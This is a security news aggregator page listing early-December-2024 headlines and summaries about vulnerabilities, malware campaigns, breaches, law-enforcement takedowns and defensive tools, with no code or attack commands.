Security News
The latest news for cybersecurity collected from vast security websites.
2024-12-06 00:46:58
Hundred of CISCO switches impacted by bootloader flawA bootloader vulnerability in Cisco NX-OS affects 100+ switches, allowing attackers to bypass image signature checks. Cisco released security patches for a vulnerability, tracked as CVE-2024-20397 (CVSS score of 5.2), in the NX-OS software’s bootloader that could be exploited by attackers to bypass image signature verification. “A vulnerability in the bootloader of Cisco NX-OS Software could […]
by Security Affairs
2024-12-05 22:18:03
Library of Congress Offers AI Legal Guidance to ResearchersResearchers testing generative AI systems can use prompt injection, re-register after being banned, and bypass rate limits without running afoul of copyright law.
by Dark Reading
2024-12-05 22:15:18
Chinese Hackers Breach US Firm, Maintain Network Access for MonthsSUMMARY A large U.S. company with operations in China fell victim to a large-scale cyberattack earlier this year,…
by Hackread
2024-12-05 22:04:39
Russia's ''BlueAlpha'' APT Hides in Cloudflare TunnelsCloudflare Tunnels is just the latest legitimate cloud service that cybercriminals and state-sponsored threat actors are abusing to hide their tracks.
by Dark Reading
2024-12-05 21:28:00
This $3,000 Android Trojan Targeting Banks and Cryptocurrency ExchangesAs many as 77 banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot. ""DroidBot is a modern RAT that combines hidden VNC and overlay attack techniques with spyware-like capabilities, such as keylogging and user interface monitoring,"" Cleafy researchers Simone Mattia, Alessandro
by The Hacker News
2024-12-05 21:18:49
US org with ‘significant presence in China’ targeted by hackers, Symantec saysThe cybersecurity firm did not name the company but said the attack was “likely carried out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers.”
by The Record
2024-12-05 21:13:03
Bypass Bug Revives Critical N-Day in Mitel MiCollabA single barrier prevented attackers from exploiting a critical vulnerability in an enterprise collaboration platform. Now there''s a workaround.
by Dark Reading
2024-12-05 20:49:12
Trojan-as-a-Service Hits Euro Banks, Crypto ExchangesAt least 17 affiliate groups have used the "DroidBot" Android banking Trojan against 77 financial services companies across Europe, with more to come, researchers warn.
by Dark Reading
2024-12-05 20:38:40
OpenAI Adds $200 Monthly ChatGPT Pro Subscription With New ModelThe new ChatGPT Pro option will cost $200 a month and offer access to an expanded version of o1.
by ITPro Today
2024-12-05 20:26:00
Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin AccessCybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. The critical vulnerability in question is CVE-2024-41713 (CVSS score: 9.8), which relates to a case of insufficient input
by The Hacker News
2024-12-05 20:25:00
Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 ServersEuropol on Thursday announced the shutdown of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale. The operation, led by German authorities, has resulted in the seizure of more than 50 servers associated with the service and the arrest of two suspects. More than 200 terabytes of digital evidence have been collected. Manson Market (""manson-market[.]pw"") is
by The Hacker News
2024-12-05 20:22:34
Pegasus Spyware Infections Proliferate Across iOS, Android DevicesThe notorious spyware from Israel''s NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 2,500 mobile phones.
by ITPro Today
2024-12-05 20:11:46
As Trump vows to remold intel agencies, US spy chief defends current model“I do think we''re safer as a consequence of the institution that I have the privilege to lead right now,” Director of National intelligence Avril Haines said during an event at the Council on Foreign Relations in Washington, D.C.
by The Record
2024-12-05 19:59:11
LLMs Raise Efficiency, Productivity of Cybersecurity TeamsAI-powered tools are making cybersecurity tasks easier to solve, as well as easier for the team to handle.
by Dark Reading
2024-12-05 19:55:47
Major USAID contractor Chemonics says 263,000 affected by 2023 data breachChemonics, which has more than $1 billion in federal government contracts, announced it had discovered a data breach that stretched from mid-2023 into early 2024.
by The Record
2024-12-05 19:33:28
Need a Wyze Cam alternative? The waterproof Blink Mini 2 security camera is my pickThe Blink Mini 2 is feature-rich, and it includes a waterproof adapter that makes it that much sweeter.
by ZDNET Security
2024-12-05 19:15:08
Top 5 Mobile Security Risks for EnterprisesOur blog is sharing the five biggest mobile security threats your business needs to be aware of The post Top 5 Mobile Security Risks for Enterprises appeared first on Zimperium.
by Zimperium
2024-12-05 19:14:22
The best security keys of 2024: Expert testedSecurity keys are physical security solutions for protecting your online accounts. We tested the best security keys that combine safety and convenience to protect you from hackers.
by ZDNET Security
2024-12-05 19:06:07
Turning threat intelligence into action: Key insights from our MITRE ATT&CK webinarDiscover how financial services can operationalize threat intelligence with MITRE ATT&CK. Learn key strategies for cybersecurity resilience in our expert-led webinar.
by Hack The Box Blog
2024-12-05 19:05:43
Report: Russian authorities seized phone from detainee, infected it with spywareThe phone belonging to Kirill Parubets, a Russian programmer who spent more than two weeks in custody, was apparently infected with spyware that the researchers say allowed authorities to track his device location, read encrypted messages and record calls and keystrokes.
by The Record
2024-12-05 19:05:31
Nebraska Man pleads guilty to dumb cryptojacking operationA Nebraska man pleaded guilty on Thursday to operating a large-scale cryptojacking operation after being arrested and charged in April. [...]
by BleepingComputer
2024-12-05 19:02:19
The adventures of an extroverted cyber nerd and the people Talos helps to fight the good fightEver wonder what an extroverted strategy security nerd does? Wonder no longer! This week, Joe pontificates on his journey at Talos, and then is inspired by the people he gets to meet and help.
by Cisco Talos Blog
2024-12-05 18:57:01
Romania's election systems targeted in over 85,000 cyberattacksA declassified report from Romania''s Intelligence Service says that the country''s election infrastructure was targeted by more than 85,000 cyberattacks. [...]
by BleepingComputer
2024-12-05 18:52:18
Chemonics discloses months-long breach affecting 263K peopleThe major USAID contractor says unauthorized access continued up to 25 days after the intrusion was first detected.
by SC Media
2024-12-05 18:39:10
Russian state hackers abuse Cloudflare services to spy on Ukrainian targetsThe group known as Gamaredon has been observed using Cloudflare Tunnels — a tool that helps hide the real location of servers or infrastructure — to infect their targets with custom GammaDrop malware and stay undetected.
by The Record
2024-12-05 18:32:36
One Identity Named Winner of the Coveted Top InfoSec Innovator Awards for 2024One Identity wins ""Hot Company: Privileged Access Management"" at the 12th Cyber Defense Magazine InfoSec Innovator Awards, showcasing PAM excellence in cybersecurity.
by Hackread
2024-12-05 18:16:00
Want to Grow Vulnerability Management into Exposure Management? Start Here!Vulnerability Management (VM) has long been a cornerstone of organizational cybersecurity. Nearly as old as the discipline of cybersecurity itself, it aims to help organizations identify and address potential security issues before they become serious problems. Yet, in recent years, the limitations of this approach have become increasingly evident. At its core, Vulnerability Management
by The Hacker News
2024-12-05 18:13:00
Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus BackdoorA previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs. ""Earth Minotaur uses MOONSHINE to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a
by The Hacker News
2024-12-05 17:36:08
Police Dismantle Manson Market, Seize 50 Servers and 200TB EvidenceSUMMARY A day after taking down the cybercrime platform MATRIX, Europol and international law enforcement agencies have successfully…
by Hackread
2024-12-05 17:32:57
The Future of eCommerce: How Custom Apps Help You Get Ahead of the CompetitionDiscover the future of eCommerce with bespoke app development. Learn how tailored solutions enhance user experience, security, and performance while empowering businesses to meet unique needs and gain a competitive edge.
by Hackread
2024-12-05 17:15:05
U.S. org suffered four month intrusion by Chinese hackersA large U.S. organization with significant presence in China has been reportedly breached by China-based threat actors who persisted on its networks from April to August 2024. [...]
by BleepingComputer
2024-12-05 17:08:54
Six identity takeaways from 2024's cyber blunders and breachesFrom phishing traps to third-party risks, these hard-hitting insights reveal what went wrong—and how to fortify your identity defenses for the future.
by SC Media
2024-12-05 17:00:27
BlueAlpha Russian hackers caught abusing CloudFlare servicesA notorious Kremlin-backed hacking group is using a legitimate network service to coordinate targeted attacks.
by SC Media
2024-12-05 16:50:08
I-O Data Confirms Zero-Day Attacks on Routers, Full Patches PendingJapanese device maker confirms zero-day router exploitation and warn that full patches won’t be available for a few weeks. The post I-O Data Confirms Zero-Day Attacks on Routers, Full Patches Pending appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 16:42:36
Telecom Giant BT Group Hit by Black Basta RansomwareBT Group, a major telecommunications firm, has been hit by a ransomware attack from the Black Basta group. The attack targeted the company''s Conferencing division, leading to server shutdowns and potential data theft.
by Hackread
2024-12-05 16:30:00
Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese HackersA suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion. According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August. However, the company doesn''t rule out the possibility that the intrusion may have occurred earlier. ""The attackers moved laterally
by The Hacker News
2024-12-05 16:17:30
Black Basta attack disrupts BT unit's serversWhile BT Group emphasized that only its BT Conferencing platform had been subjected to an attempted compromise that did not affect its other services, Black Basta claimed to have exfiltrated 500 GB of data from the firm''s servers, including user information, personal documents, nondisclosure agreements, financial and organizational details, and other confidential files.
by SC Media
2024-12-05 16:10:52
Turla targets Pakistani APT infrastructure for espionageAfter achieving initial access to a Storm-0156 C2 server in December 2022, Turla sought to take over more of the Pakistani threat operation''s C2s to compromise Afghan government organizations'' networks with the TwoDash downloader and Statuezy trojan.
by SC Media
2024-12-05 16:01:57
Salt Typhoon hack assessment imminent, says Easterly""We wanted to make sure we did it before the holidays, so we could start writing out how we think about the problem, and then ultimately, what are the key recommendations that we need to bring forward to enable us to strengthen the security of the telecommunications networks going forward,"" said Easterly.
by SC Media
2024-12-05 15:58:36
'Earth Minotaur'' Exploits WeChat Bugs, Sends Spyware to UyghursThe emerging threat actor, potentially a Chinese state-sponsored APT, is using the known exploit kit Moonshine in cross-platform attacks that deliver a previously undisclosed backdoor called "DarkNimbus" to ethnic minorities, including Tibetans.
by Dark Reading
2024-12-05 15:51:56
The Dumbest Thing in Security This Week: The Hacker Who Threatened the Wrong PersonPro tip for hackers: Don’t threaten people whose specialty is uncovering the identity of cybercriminals. That mistake apparently led to the October arrest of Alexander “Connor” Moucka, 25, the alleged mastermind behind the massive Snowflake data breach earlier this year. The Kitchener, Ontario resident is currently in Maplehurst Correctional Complex awaiting extradition proceedings that will determine whether he stands trial in the U.S. Here’s the story behind Moucka’s arrest, or as much of it as investigators are willing to reveal. Hacker Threats ''The Stupidest Thing Ever'' Moucka had allegedly been boasting about his exploits on Telegram under the alias ‘Waifu” when he threatened Unit221B Chief Research Officer Allison Nixon – who then assigned one of her researchers to find out his real identity, according to the Waterloo Region Record. “Why would he target a company that is not working on his case and specializes in identifying cybercriminals?” Nixon told the Toronto-based paper. “It is just the stupidest thing ever.” [caption id=""attachment_99378"" align=""alignright"" width=""240""] Allison Nixon[/caption] It took several months – and one critical operational mistake by Waifu – before Moucka’s name was handed over to law enforcement. Nixon isn’t saying much about Waifu’s mistakes in order to keep cybercriminals from learning from them. Nor is she saying much about the threats he made, telling The Cyber Express that they included “every kind of bad language that kids on the internet say basically.” A threat actor who goes by the alias “kiberphant0m” has taken up Moucka’s cause since the arrest, in addition to selling data from Snowflake and other breaches – including what may be older call logs from President-elect Donald Trump and Vice President Kamala Harris. Asked if she had any idea who kiberphant0m is, Nixon replied, “no comment.” Waifu’s History Allegedly Includes ''The Com'' Nixon first crossed paths with “Waifu” in 2019 when the New York Police Department was seeking information about the hacker, who identified as a member of “The Com,” a loose cybercrime collective she had been tracking that also includes the group known as “Scattered Spider.” The Com has also been linked to extortion, violence, swatting and other disturbing acts, so a threat from a member wasn’t something to be taken lightly. Nixon reveals something of her own exploits on her X feed, and some of her posts have a bit of a taunting tone, such as saying “this guy spent too much time posting and not enough getting a lawyer” while linking to an article on an arrest. And while she doesn’t directly say which cases she was involved in, there are hints, such as posting “Who wants to be next?” when linking to an arrest. She did that with news of Moucka’s arrest, and again recently when linking to the case of Remington Ogletree, a 19-year-old alleged Scattered Spider member charged with telecom and financial breaches. This is probably wasted advice given the culture of some threat groups, but be careful who you pick fights with online. You might be dealing with a formidable opponent like Nixon.
by The Cyber Express
2024-12-05 15:48:55
Balbix unveils new AI-powered cybersecurity toolsThe offerings are AI cybersecurity assistant BIX, Cyber Risk Assessments, a one-time AI-powered vulnerability evaluation, and a continuous threat and exposure management platform called D3.
by SC Media
2024-12-05 15:43:59
U.K. cybersecurity chief warns of increasing cyber threatsRichard Horne, a senior official at the agency, highlighted how adversaries exploit the nation’s technological dependence to maximize disruption and destruction.
by SC Media
2024-12-05 15:40:48
German authorities dismantle 'Crimenetwork'' marketplaceThe site, which has been in operation since 2012, boasted over 100 vendors and 100,000 customers, facilitating illegal transactions in cryptocurrencies like Bitcoin and Monero.
by SC Media
2024-12-05 15:39:04
Burnout in SOCs: How AI Can Help Analysts Focus on High-Value TasksSOC analysts, vital to cybersecurity, face burnout due to exhausting workloads, risking their well-being and the effectiveness of organizational defenses. Security Operations Center (SOC) analyst burnout is a very real problem. These are some of the most important cybersecurity professionals out there, and many of them are being worked to exhaustion. Amidst an already overstretched […]
by Security Affairs
2024-12-05 15:31:18
US arrests Scattered Spider suspect linked to telecom hacksU.S. authorities have arrested a 19-year-old teenager linked to the notorious Scattered Spider cybercrime gang who is now charged with breaching a U.S. financial institution and two unnamed telecommunications firms. [...]
by BleepingComputer
2024-12-05 15:30:49
Law enforcement shuts down Manson Market cybercrime marketplaceEuropol has supported the dismantling of a sophisticated criminal network responsible for facilitating large-scale online fraud. In an operation led by the Hanover Police Department (Polizeidirektion Hannover) and the Verden Public Prosecutor’s Office (Staatsanwaltschaft Verden) in Germany, and supported by law enforcement authorities from Austria, Czechia, Finland, Poland and the Netherlands, over 50 servers were seized, significant digital evidence was secured, and two key suspects were arrested. A central hub for cyber fraud The investigation … More → The post Law enforcement shuts down Manson Market cybercrime marketplace appeared first on Help Net Security.
by Help Net Security
2024-12-05 15:23:28
North Korean IT infiltrations expected to persistSecurity researchers at the recent Cyberwarcon conference in Washington, D.C., detailed North Korea’s increasing use of fraudulent IT workers to infiltrate multinational corporations and funnel earnings to the North Korean regime while conducting corporate data theft to support the country’s nuclear weapons program.
by SC Media
2024-12-05 15:09:07
Operation Destabilise dismantled Russian money laundering networksOperation Destabilise: The U.K. National Crime Agency disrupted Russian money laundering networks tied to organized crime. The U.K. National Crime Agency (NCA) disrupted Russian money laundering networks linked to organized crime across the U.K., Middle East, Russia, and South America as part of an operation called “Operation Destabilise.” “An international NCA-led investigation – Operation Destabilise […]
by Security Affairs
2024-12-05 15:00:00
ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & BreachesThis blog will be referencing the ICS/OT Backdoors & Breaches expansion deck created by BHIS and Dragos. We will be reviewing the ICS-focused Initial Compromise cards that are used to simulate a cyber incident and suggest potential mitigations to what is presented. The post ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & Breaches appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-12-05 15:00:00
Vulnerability Management Challenges in IoT & OT EnvironmentsBy understanding the unique challenges of protecting IoT and OT devices, organizations can safeguard these critical assets against evolving cyber threats.
by Dark Reading
2024-12-05 15:00:00
Kubernetes 1.32 – What’s new?Kubernetes 1.32 is right around the corner, and there are quite a lot of changes ready for the Holiday Season!... The post Kubernetes 1.32 – What’s new? appeared first on Sysdig.
by Sysdig
2024-12-05 14:59:33
Americans urged to use encrypted messaging after large, ongoing cyberattackUS telecom providers have been infiltrated to a worrying level by an APT group. The advice is to use encrypted messaging.
by Malwarebytes Labs
2024-12-05 14:50:00
Security for Amazon EKS hybrid nodes: Bridging cloud and on-premises Kubernetes securityThe introduction of Amazon Elastic Kubernetes Service (EKS) Hybrid Nodes by AWS is a game-changer for organizations striving to unify... The post Security for Amazon EKS hybrid nodes: Bridging cloud and on-premises Kubernetes security appeared first on Sysdig.
by Sysdig
2024-12-05 14:45:00
3 Lessons from Barracuda’s 2024 HackathonContinuing our tradition of conducting internal hackathons (sometimes called Cudathons) each year, Barracuda recently hosted a hackathon with our product teams from around the world to help drive innovation and fresh ideas.
by Barracuda
2024-12-05 14:30:53
Mitek Digital Fraud Defender combats AI generated fraudMitek announced Digital Fraud Defender (DFD), an advanced, multi-layered solution to safeguard digital identity verification processes against sophisticated AI-enabled fraud tactics. Designed for financial institutions, fintech, online gaming providers, and enterprises requiring remote identity verification, the new suite addresses the urgent and growing challenges posed by generative AI’s potential to create highly realistic fake images, documents, and videos. According to Deloitte’s Center for Financial Services, fraud losses from generative AI could surge from $12.3 billion … More → The post Mitek Digital Fraud Defender combats AI generated fraud appeared first on Help Net Security.
by Help Net Security
2024-12-05 14:24:32
Mitel MiCollab zero-day and PoC exploit unveiledA zero-day vulnerability in the Mitel MiCollab enterprise collaboration suite can be exploited to read files containing sensitive data, watchTowr researcher Sonny Macdonald has disclosed, and followed up by releasing a proof-of-concept (PoC) exploit that chains together this zero-day file read vulnerability with CVE-2024-41713, which allows attackers to bypass authentication. A zero-day and PoC to grab sensitive info of MiCollab users In a blog post published on Thursday, Macdonald tells of watchTowr’s quest to reproduce … More → The post Mitel MiCollab zero-day and PoC exploit unveiled appeared first on Help Net Security.
by Help Net Security
2024-12-05 14:12:39
Bitdefender GravityZone XDR enhancements protect business data stored in the cloudBitdefender announced enhancements to its GravityZone XDR platform with the addition of its new Business Applications sensor, designed to protect corporate data hosted and stored in cloud-based productivity and collaboration applications. The sensor will initially support Atlassian cloud applications including Confluence, Jira, and Bitbucket, with plans to extend to other popular software-as-a-service (SaaS) platforms frequently used in business operations. “XDR provides organizations with the visibility needed to monitor, correlate, and respond quickly to security events … More → The post Bitdefender GravityZone XDR enhancements protect business data stored in the cloud appeared first on Help Net Security.
by Help Net Security
2024-12-05 14:02:03
Jazzer Back to Open Source: New Features | News | Code IntelligenceWe are beyond excited to share some fantastic news with our community: Jazzer is now fully open source again under the Apache 2.0 license! 🎉
by Code Intelligence
2024-12-05 14:00:45
Watch Now: Cyber AI & Automation Summit- All Sessions Available On DemandSecurityWeek’s Cyber AI & Automation Summit took place on December 4th, as an online event. The post Watch Now: Cyber AI & Automation Summit- All Sessions Available On Demand appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 14:00:00
Roundup: The top ransomware stories of 2024The year 2024 saw a marked increase in the competence, aggression and unpredictability of ransomware attackers. Nearly all the key numbers are up — more ransomware gangs, bigger targets and higher payouts. Malicious ransomware groups also focus on critical infrastructure and supply chains, raising the stakes for victims and increasing the motivation to cooperate. Here […] The post Roundup: The top ransomware stories of 2024 appeared first on Security Intelligence.
by Security Intelligence
2024-12-05 13:47:17
Netography introduces AI-powered ransomware detection capabilitiesNetography announced new ransomware detection capabilities that enable organizations to respond to malicious activity in real-time before it disrupts operations or threatens business continuity. These AI-powered enhancements enable Fusion customers to close the network observability and security gaps caused by limitations in their existing platform-native and cloud-native tools, including the inability to detect malicious activity and the lack of a holistic view of all network activity. The scope of the ransomware problem continues to grow, … More → The post Netography introduces AI-powered ransomware detection capabilities appeared first on Help Net Security.
by Help Net Security
2024-12-05 13:46:51
“aiocpa” Python Package Exposed as Cryptocurrency InfostealerSUMMARY The machine learning-based threat-hunting system of leading threat intelligence and cybersecurity firm ReversingLabs (RL) recently detected malicious…
by Hackread
2024-12-05 13:46:46
5 Common Threat Actor Tactics Used in Cloud, Identity, and SaaS AttacksExplore five common tactics used in cloud attacks and recommendations on how to defend against them.
by Mitiga
2024-12-05 13:26:49
‘DroidBot’ Android Trojan Targets Banking, Cryptocurrency ApplicationsThe newly discovered DroidBot Android trojan targets 77 banks, cryptocurrency exchanges, and national organizations. The post ‘DroidBot’ Android Trojan Targets Banking, Cryptocurrency Applications appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 13:24:25
Middesk Address Risk Insights strengthens onboarding processesMiddesk introduced Address Risk Insights, a critical new addition to its core Know Your Business (KYB) product Verify and its recently introduced risk scoring Signal product. A first for the KYB space, Address Risk Insights helps companies assess the risk of a businesses’ address during onboarding or ongoing monitoring, ensuring they approve only trusted and legitimate customers. Nine out of 10 enterprises and small businesses deal with identity fraud in a given year according to … More → The post Middesk Address Risk Insights strengthens onboarding processes appeared first on Help Net Security.
by Help Net Security
2024-12-05 13:21:23
New Android Spyware Used by Russian State-Backed Entities FoundA recent investigation by Citizen Lab and First Department revealed that spyware resembling the notorious Monokle family was implanted on a device returned to a Russian programmer after his detention. The malware, linked to Russian state-backed entities, demonstrates advanced surveillance capabilities, raising concerns about its use for targeted espionage. Monokle spyware, first identified in 2019 … The post New Android Spyware Used by Russian State-Backed Entities Found appeared first on CyberInsider.
by Cyber Insider
2024-12-05 13:20:00
What are Common Criteria (CC) for Information Technology Security Evaluation?
by ComputerWeekly
2024-12-05 13:10:31
50 Servers Linked to Cybercrime Marketplace and Phishing Sites Seized by Law EnforcementEuropol announced an operation targeting a cybercrime marketplace and phishing websites, including the arrests of two suspects. The post 50 Servers Linked to Cybercrime Marketplace and Phishing Sites Seized by Law Enforcement appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 13:00:13
The Cybersecurity Challenge in Mergers and AcquisitionsTake a deep dive into five critical M&A cyber threats we’ve recently helped our customers navigate.
by ReliaQuest
2024-12-05 13:00:00
ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against JapanThe China-linked threat actor known as MirrorFace has been attributed to a new spear-phishing campaign mainly targeting individuals and organizations in Japan since June 2024. The aim of the campaign is to deliver backdoors known as NOOPDOOR (aka HiddenFace) and ANEL (aka UPPERCUT), Trend Micro said in a technical analysis. ""An interesting aspect of this campaign is the comeback of a backdoor
by The Hacker News
2024-12-05 12:53:00
Announcing the launch of Vanir: Open-source Security Patch ValidationPosted by Hyunwook Baek, Duy Truong, Justin Dunlap and Lauren Stan from Android Security and Privacy, and Oliver Chang from the Google Open Source Security TeamToday, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches. Vanir significantly accelerates patch validation by automating this process, allowing OEMs to ensure devices are protected with critical security updates much faster than traditional methods. This strengthens the security of the Android ecosystem, helping to keep Android users around the world safe. By open-sourcing Vanir, we aim to empower the broader security community to contribute to and benefit from this tool, enabling wider adoption and ultimately improving security across various ecosystems. While initially designed for Android, Vanir can be easily adapted to other ecosystems with relatively small modifications, making it a versatile tool for enhancing software security across the board. In collaboration with the Google Open Source Security Team, we have incorporated feedback from our early adopters to improve Vanir and make it more useful for security professionals. This tool is now available for you to start developing on top of, and integrating into, your systems.The need for VanirThe Android ecosystem relies on a multi-stage process for vulnerability mitigation. When a new vulnerability is discovered, upstream AOSP developers create and release upstream patches. The downstream device and chip manufacturers then assess the impact on their specific devices and backport the necessary fixes. This process, while effective, can present scalability challenges, especially for manufacturers managing a diverse range of devices and old models with complex update histories. Managing patch coverage across diverse and customized devices often requires considerable effort due to the manual nature of backporting.To streamline the vital security workflow, we developed Vanir. Vanir provides a scalable and sustainable solution for security patch adoption and validation, helping to ensure Android devices receive timely protection against potential threats.The power of VanirSource-code-based static analysis Vanir’s first-of-its-kind approach to Android security patch validation uses source-code-based static analysis to directly compare the target source code against known vulnerable code patterns. Vanir does not rely on traditional metadata-based validation mechanisms, such as version numbers, repository history and build configs, which can be prone to errors. This unique approach enables Vanir to analyze entire codebases with full history, individual files, or even partial code snippets. A main focus of Vanir is to automate the time consuming and costly process of identifying missing security patches in the open source software ecosystem. During the early development of Vanir, it became clear that manually identifying a high-volume of missing patches is not only labor intensive but also can leave user devices inadvertently exposed to known vulnerabilities for a period of time. To address this, Vanir utilizes novel automatic signature refinement techniques and multiple pattern analysis algorithms, inspired by the vulnerable code clone detection algorithms proposed by Jang et al. [1] and Kim et al. [2]. These algorithms have low false-alarm rates and can effectively handle broad classes of code changes that might appear in code patch processes. In fact, based on our 2-year operation of Vanir, only 2.72% of signatures triggered false alarms. This allows Vanir to efficiently find missing patches, even with code changes, while minimizing unnecessary alerts and manual review efforts. Vanir''s source-code-based approach also enables rapid scaling across any ecosystem. It can generate signatures for any source files written in supported languages. Vanir''s signature generator automatically generates, tests, and refines these signatures, allowing users to quickly create signatures for new vulnerabilities in any ecosystem simply by providing source files with security patches. Android’s successful use of Vanir highlights its efficiency compared to traditional patch verification methods. A single engineer used Vanir to generate signatures for over 150 vulnerabilities and verify missing security patches across its downstream branches – all within just five days.Vanir for AndroidCurrently Vanir supports C/C++ and Java targets and covers 95% of Android kernel and userspace CVEs with public security patches. Google Android Security team consistently incorporates the latest CVEs into Vanir’s coverage to provide a complete picture of the Android ecosystem’s patch adoption risk profile. The Vanir signatures for Android vulnerabilities are published through the Open Source Vulnerabilities (OSV) database. This allows Vanir users to seamlessly protect their codebases against latest Android vulnerabilities without any additional updates. Currently, there are over 2,000 Android vulnerabilities in OSV, and finishing scanning an entire Android source tree can take 10-20 minutes with a modern PC.Flexible integration, adoption and expansion.Vanir is developed not only as a standalone application but also as a Python library. Users who want to integrate automated patch verification processes with their continuous build or test chain may easily achieve it by wiring their build integration tool with Vanir scanner libraries. For instance, Vanir is integrated with a continuous testing pipeline in Google, ensuring all security patches are adopted in ever-evolving Android codebase and their first-party downstream branches.Vanir is also fully open-sourced, and under BSD-3 license. As Vanir is not fundamentally limited to the Android ecosystem, you may easily adopt Vanir for the ecosystem that you want to protect by making relatively small modifications in Vanir. In addition, since Vanir’s underlying algorithm is not limited to security patch validation, you may modify the source and use it for different purposes such as licensed code detection or code clone detection. The Android Security team welcomes your contributions to Vanir for any direction that may expand its capability and scope. You can also contribute to Vanir by providing vulnerability data with Vanir signatures to OSV.Vanir ResultsSince early last year, we have partnered with several Android OEMs to test the tool’s effectiveness. Internally we have been able to integrate the tool into our build system continuously testing against over 1,300 vulnerabilities. Currently Vanir covers 95% of all Android, Wear, and Pixel vulnerabilities with public fixes across Android Kernel and Userspace. It has a 97% accuracy rate, which has saved our internal teams over 500 hours to date in patch fix time.Next stepsWe are happy to announce that Vanir is now available for public use. Vanir is not technically limited to Android, and we are also actively exploring problems that Vanir may help address, such as general C/C++ dependency management via integration with OSV-scanner. If you are interested in using or contributing to Vanir, please visit github.com/google/vanir. Please join our public community to submit your feedback and questions on the tool. We look forward to working with you on Vanir!
by Google Security Blog
2024-12-05 12:48:28
Operation Tinsel Trace II: Join the resistance against Krampus!Krampus has left some gifts for Santa, it turns out—it’s malware. Use your holiday spirit to hone in and eliminate the threat!
by Hack The Box Blog
2024-12-05 12:44:54
Police shuts down Manson cybercrime market, arrests key suspectsGerman law enforcement has seized over 50 servers that hosted the Manson Market cybercrime marketplace and fake online shops used in phishing operations. [...]
by BleepingComputer
2024-12-05 12:42:51
How laws strain to keep pace with AI advances and data theftKey questions remain unresolved concerning the use of Gen AI tools, while one country may need stronger deterrence against data theft.
by ZDNET Security
2024-12-05 12:30:13
Atrium Health Discloses Data Exposure Involving Patient PortalAtrium Health has issued a public notification regarding a privacy issue that potentially exposed patient data through the use of online tracking technologies on its MyAtriumHealth Patient Portal. The issue stems from tracking tools active between January 2015 and July 2019, which may have transmitted limited personal information to third-party vendors, such as Google and … The post Atrium Health Discloses Data Exposure Involving Patient Portal appeared first on CyberInsider.
by Cyber Insider
2024-12-05 12:30:00
Government agencies urged to use encrypted messaging after Chinese Salt Typhoon hack
by ComputerWeekly
2024-12-05 12:30:00
Bootloader Vulnerability Impacts Over 100 Cisco SwitchesMore than 100 Cisco products are affected by an NX-OS vulnerability that allows attackers to bypass image signature verification. The post Bootloader Vulnerability Impacts Over 100 Cisco Switches appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 12:18:11
8 US telcos compromised, FBI advises Americans to use encrypted communicationsFBI and Cybersecurity and Infrastructure Security Agency (CISA) officials have advised Americans to use encrypted call and messaging apps to protect their communications from threat actors that have – and will – burrow into the networks and systems of US telecommunication companies. NBC News reported that the advice was given during a conference call with the media on Tuesday, during which the official also shared that the compromise of the networks of multiple US telcos … More → The post 8 US telcos compromised, FBI advises Americans to use encrypted communications appeared first on Help Net Security.
by Help Net Security
2024-12-05 12:17:25
New Android spyware found on phone seized by Russian FSBAfter a Russian programmer was detained by Russia''s Federal Security Service (FSB) for fifteen days and his phone confiscated, it was discovered that a new spyware was secretly installed on his device upon its return. [...]
by BleepingComputer
2024-12-05 12:07:08
What is Cross-Site Scripting (XSS)?Cross-site scripting is a type of attack where a vulnerability in web applications is exploited and malicious script is injected into the site content.
by ThreatDown
2024-12-05 12:05:02
Tor Project Retires BridgeDB in Favor of Rdsys to Fight CensorshipThe Tor Project has transitioned from its longstanding bridge distribution system, BridgeDB, to a more advanced and flexible platform known as Rdsys. This move aims to enhance the network''s resilience against evolving censorship tactics and improve overall user accessibility. BridgeDB, introduced over a decade ago, functioned as a prototype to assist users in bypassing censorship … The post Tor Project Retires BridgeDB in Favor of Rdsys to Fight Censorship appeared first on CyberInsider.
by Cyber Insider
2024-12-05 12:00:00
Chemonics International Data Breach Impacts 260,000 IndividualsDevelopment firm Chemonics International has disclosed a year-old data breach impacting over 260,000 people. The post Chemonics International Data Breach Impacts 260,000 Individuals appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 11:58:58
